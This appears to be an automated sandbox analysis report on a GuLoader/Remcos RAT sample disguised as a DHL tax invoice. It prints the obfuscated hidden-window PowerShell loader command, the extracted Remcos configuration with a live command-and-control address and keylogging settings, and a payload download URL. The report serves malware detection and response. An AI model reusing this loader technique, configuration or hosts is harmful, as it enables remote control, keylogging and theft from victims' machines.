Windows Analysis Report
DHL TAX INVOICES - MARCH 2024.exe

Overview

General Information

Sample name: DHL TAX INVOICES - MARCH 2024.exe
Analysis ID: 1416845
MD5: 9751f18fb374bf112f867381a68bb3a9
SHA1: b6690412b3ce7e65d76437b4d6704a3646e62938
SHA256: d53afbfc333acb95639354fe5eb9cddce8fc0f59190d23dbfa60fec9944a5e27
Tags: DHL, exe, RAT, RemcosRAT

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected Remcos RAT
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Obfuscated command line found
Powershell drops PE file
Sample uses process hollowing technique
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious powershell command line found
Writes to foreign memory regions
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Dosfuscation Activity
Too many similar processes found
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • DHL TAX INVOICES - MARCH 2024.exe (PID: 1228 cmdline: "C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe" MD5: 9751F18FB374BF112F867381A68BB3A9)
    • powershell.exe (PID: 4908 cmdline: "powershell.exe" -windowstyle hidden "$Panoramic=Get-Content 'C:\Users\user\AppData\Local\releve\Handelshindringens.Dec';$Voldtgtsforbryders=$Panoramic.SubString(51097,3);.$Voldtgtsforbryders($Panoramic)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7256 cmdline: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • wab.exe (PID: 7824 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 7952 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 7960 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 7968 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 7976 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 7984 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 7992 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8000 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8008 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8016 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8024 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8032 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8040 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8048 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8056 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8064 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8072 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8080 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8088 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8096 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8104 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8112 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8120 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8128 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8136 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8144 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8152 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8160 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8168 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8176 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8184 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 5444 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 6128 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 2004 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 7268 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 7256 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 7276 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution: APT33, The Gorgon Group, UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

{"Host:Port:Password": "162.251.122.89:2404:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-EEMA4A", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Source | Rule | Description | Author | Strings
C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |

Source | Rule | Description | Author | Strings
00000007.00000002.2866475335.0000000002FAF000.00000004.00000010.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000007.00000002.2870944268.00000000089CE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000007.00000002.2870944268.00000000089B2000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000001.00000002.2320550123.000000000B115000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
Process Memory Space: wab.exe PID: 7824 | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |

              System Summary

              Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu", CommandLine: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Windows Mail\wab.exe, NewProcessName: C:\Program Files (x86)\Windows Mail\wab.exe, OriginalFileName: C:\Program Files (x86)\Windows Mail\wab.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7824, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu", ProcessId: 7952, ProcessName: wab.exe
              Source: File created, Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4908, TargetFilename: C:\Users\user\AppData\Local\releve\DHL TAX INVOICES - MARCH 2024.exe
              Source: Process started, Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", CommandLine: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "powershell.exe" -windowstyle hidden "$Panoramic=Get-Content 'C:\Users\user\AppData\Local\releve\Handelshindringens.Dec';$Voldtgtsforbryders=$Panoramic.SubString(51097,3);.$Voldtgtsforbryders($Panoramic)", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4908, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", ProcessId: 7256, ProcessName: cmd.exe
              Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Panoramic=Get-Content 'C:\Users\user\AppData\Local\releve\Handelshindringens.Dec';$Voldtgtsforbryders=$Panoramic.SubString(51097,3);.$Voldtgtsforbryders($Panoramic)", CommandLine: "powershell.exe" -windowstyle hidden "$Panoramic=Get-Content 'C:\Users\user\AppData\Local\releve\Handelshindringens.Dec';$Voldtgtsforbryders=$Panoramic.SubString(51097,3);.$Voldtgtsforbryders($Panoramic)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe", ParentImage: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe, ParentProcessId: 1228, ParentProcessName: DHL TAX INVOICES - MARCH 2024.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Panoramic=Get-Content 'C:\Users\user\AppData\Local\releve\Handelshindringens.Dec';$Voldtgtsforbryders=$Panoramic.SubString(51097,3);.$Voldtgtsforbryders($Panoramic)", ProcessId: 4908, ProcessName: powershell.exe

              Stealing of Sensitive Information

              Source: File created, Author: Joe Security: Data: EventID: 11, Image: C:\Program Files (x86)\Windows Mail\wab.exe, ProcessId: 7824, TargetFilename: C:\ProgramData\remcos\logs.dat
              No Snort rule has matched

              AV Detection

              Source: http://pesterbdd.com/images/Pester.png, URL Reputation: Label: malware
              Source: http://geoplugin.net/json.gp, URL Reputation: Label: phishing
              Source: 00000007.00000002.2870944268.00000000089B2000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: Remcos {"Host:Port:Password": "162.251.122.89:2404:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-EEMA4A", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
              Source: C:\Users\user\AppData\Local\releve\DHL TAX INVOICES - MARCH 2024.exe, Virustotal: Detection: 13%
              Source: DHL TAX INVOICES - MARCH 2024.exe, Virustotal: Detection: 13%
              Source: Yara match, File source: 00000007.00000002.2866475335.0000000002FAF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000007.00000002.2870944268.00000000089CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000007.00000002.2870944268.00000000089B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: Process Memory Space: wab.exe PID: 7824, type: MEMORYSTR
              Source: Yara match, File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: C:\Users\user\AppData\Local\releve\DHL TAX INVOICES - MARCH 2024.exe, Joe Sandbox ML: detected
              Source: DHL TAX INVOICES - MARCH 2024.exe, Joe Sandbox ML: detected
              Source: DHL TAX INVOICES - MARCH 2024.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: DHL TAX INVOICES - MARCH 2024.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2317930133.0000000006C80000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbSt source: powershell.exe, 00000001.00000002.2317930133.0000000006D38000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.2317930133.0000000006C80000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5Q source: powershell.exe, 00000001.00000002.2313644718.000000000079F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbk source: powershell.exe, 00000001.00000002.2317930133.0000000006C80000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: s\System.Core.pdb source: powershell.exe, 00000001.00000002.2320109196.0000000007EE6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2313644718.000000000079F000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe, Code function: 0_2_0040596F CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040596F
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe, Code function: 0_2_004064C1 FindFirstFileW,FindClose,0_2_004064C1
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe, Code function: 0_2_004027FB FindFirstFileW,0_2_004027FB

              Networking

              Source: Malware configuration extractor, URLs: 162.251.122.89
              Source: global traffic, TCP traffic: 192.168.2.4:49737 -> 162.251.122.89:2404
              Source: global traffic, HTTP traffic detected: GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
              Source: Joe Sandbox View, IP Address: 178.237.33.50
              Source: Joe Sandbox View, ASN Name: UNREAL-SERVERSUS
              Source: global traffic, HTTP traffic detected: GET /gDuOvMZLyhtbvV140.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: 83.137.157.76 Cache-Control: no-cache
              Source: unknown, TCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: wab.exe, 00000007.00000002.2884225115.0000000024340000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: wab.exe, 00000007.00000002.2884225115.0000000024340000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: unknownDNS traffic detected: queries for: geoplugin.net
              Source: wab.exe, 00000007.00000002.2883921770.0000000023A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://83.137.157.76/gDuOvMZLyhtbvV140.bin
              Source: wab.exe, 00000007.00000002.2870944268.00000000089B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://83.137.157.76/gDuOvMZLyhtbvV140.binQ
              Source: wab.exe, 00000007.00000002.2870944268.00000000089B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://83.137.157.76/gDuOvMZLyhtbvV140.bini
              Source: wab.exe, 00000007.00000002.2870944268.000000000898B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
              Source: wab.exe, 00000007.00000002.2870944268.00000000089B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: wab.exe, 00000007.00000002.2870944268.00000000089B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp2
              Source: wab.exe, 00000007.00000002.2870944268.00000000089B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpe
              Source: DHL TAX INVOICES - MARCH 2024.exe, DHL TAX INVOICES - MARCH 2024.exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: powershell.exe, 00000001.00000002.2316833699.000000000580B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000001.00000002.2314356147.00000000048F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000001.00000002.2314356147.00000000047A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000001.00000002.2314356147.00000000048F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: wab.exe, 00000007.00000002.2884225115.0000000024340000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: wab.exe, 00000007.00000002.2884225115.0000000024340000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: wab.exe, 00000007.00000002.2884225115.0000000024340000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: wab.exe, 00000007.00000002.2884225115.0000000024340000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: wab.exe, 00000007.00000002.2884225115.0000000024340000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: powershell.exe, 00000001.00000002.2314356147.00000000047A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000001.00000002.2316833699.000000000580B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000001.00000002.2316833699.000000000580B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000001.00000002.2316833699.000000000580B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000001.00000002.2314356147.00000000048F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000001.00000002.2316833699.000000000580B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: wab.exe, 00000007.00000002.2884225115.0000000024340000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              Source: C:\Program Files (x86)\Windows Mail\wab.exe, Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe, Code function: 0_2_0040541C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040541C

              E-Banking Fraud

              Source: Yara match | File source: 00000007.00000002.2866475335.0000000002FAF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000007.00000002.2870944268.00000000089CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000007.00000002.2870944268.00000000089B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: wab.exe PID: 7824, type: MEMORYSTR
              Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: wab.exe | Process created: 72

              System Summary

              Source: initial sample | Static PE information: Filename: DHL TAX INVOICES - MARCH 2024.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\releve\DHL TAX INVOICES - MARCH 2024.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe | Code function: 0_2_004033B6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033B6
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe | Code function: 0_2_00406846 0_2_00406846
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe | Code function: 0_2_00404C59 0_2_00404C59
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_008FF4F8 1_2_008FF4F8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_008FEDB0 1_2_008FEDB0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_0702CF18 1_2_0702CF18
              Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll EE052FD5141BF769B841846170AABF0D7C2BB922C74C623C3F109344534F7A70
